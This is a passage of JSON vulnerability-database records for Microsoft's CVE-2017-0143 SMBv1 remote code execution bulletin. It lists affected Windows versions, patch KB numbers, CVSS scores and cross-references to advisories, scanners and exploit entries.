"KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:46:24", "differentElements": ["msAffectedSoftware"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T16:51:19", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T16:51:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T16:51:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3205409", "KB3213986", "KB4013429", "KB4012213", "KB4012606", "KB4012215", "KBMS16-110, 3187754", "KB4012216", "KB4012212", "KB3210720", "KB3212646", "KB4012214", "KB3177186", "KB3210721", "KB4012217", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:51:19", "differentElements": ["msAffectedSoftware"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T06:46:35", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T06:46:35", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T06:46:35", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012215", "KB3210720", "KB3213986", "KB3205409", "KB3205401", "KB4012214", "KB3212646", "KBMS16-110, 3187754", "KB4013429", "KB4013198", "KB4012216", "KB4012213", "KB4012598", "KB4012212", "KB4012606", "KB4012217", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", 